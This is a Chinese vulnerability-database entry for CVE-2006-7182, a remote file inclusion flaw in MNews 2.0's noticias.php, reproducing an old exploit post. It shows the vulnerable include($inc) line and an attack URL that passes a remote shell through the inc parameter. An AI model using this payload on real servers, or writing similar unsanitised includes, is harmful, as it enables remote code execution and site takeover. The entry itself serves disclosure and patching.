MNews noticias.php 远程文件包含漏洞

QQ空间 新浪微博 微信 QQ facebook twitter
漏洞ID 1191157 漏洞类型 未知
发布时间 2007-03-30 更新时间 2007-03-30
CVE编号 CVE-2006-7182 CNNVD-ID CNNVD-200703-695
漏洞平台 N/A CVSS评分 10.0
|漏洞来源
https://www.securityfocus.com/bid/86833
https://cxsecurity.com/issue/WLB-2007040001
http://www.cnnvd.org.cn/web/xxk/ldxqById.tag?CNNVD=CNNVD-200703-695
|漏洞详情
MNews的noticias.php中存在PHP远程文件包含漏洞。远程攻击者可以借助inc参数中的一个URL,执行任意的PHP代码。
|漏洞EXP
=====================================================================

# MNews <= 2.0 (noticias.php) Remote File Inclue Vulnerability

=====================================================================

# Author : Le CoPrA

=====================================================================

# Download Script : http://www.s3hr.com/MNews2.0.zip

=====================================================================
  
  # Bug in : noticias.php

# Vuln Code :

include($inc);

=====================================================================

# Exploit :

http://www.victim.com/[path]/noticias.php?inc=|SHELL|?

=====================================================================

# Discovered by : Le CoPrA

# ConTaCT  :  Le.CoPrA |at| Hotmail |dot| CoM

# Special Greetz FlyinG 2 || Str0ke , xoron , mdx ||

# Greetz4// alkasrgolden,LovER BoY, Saudi Hackrz, HACKERS PAL,kOnDoR, Black-Code, CrAsH_oVeR_rIdE, bOhAjEr, Broken-Proxy, simo64
             3theaby geer, Mohajer22, Qaher_Yhod, MR.WOLF, cRiMiNaL NeT, al3iznet,Abdullah-00 , egyptghost, ToOoFA,HaKrAwY

# Channel : wWw.TrYaG.cOm/vb  || WwW.kOnDoR4.Com/vb || wWw.Q8cracker.com

========================================================================
===================================================
|受影响的产品
Mnews Mnews 2.0
|参考资料

来源:BUGTRAQ
名称:20061013MNews<=2.0(noticias.php)RemoteFileInclueVulnerability
链接:http://www.securityfocus.com/archive/1/archive/1/448629/100/0/threaded
来源:SREASON
名称:2493
链接:http://securityreason.com/securityalert/2493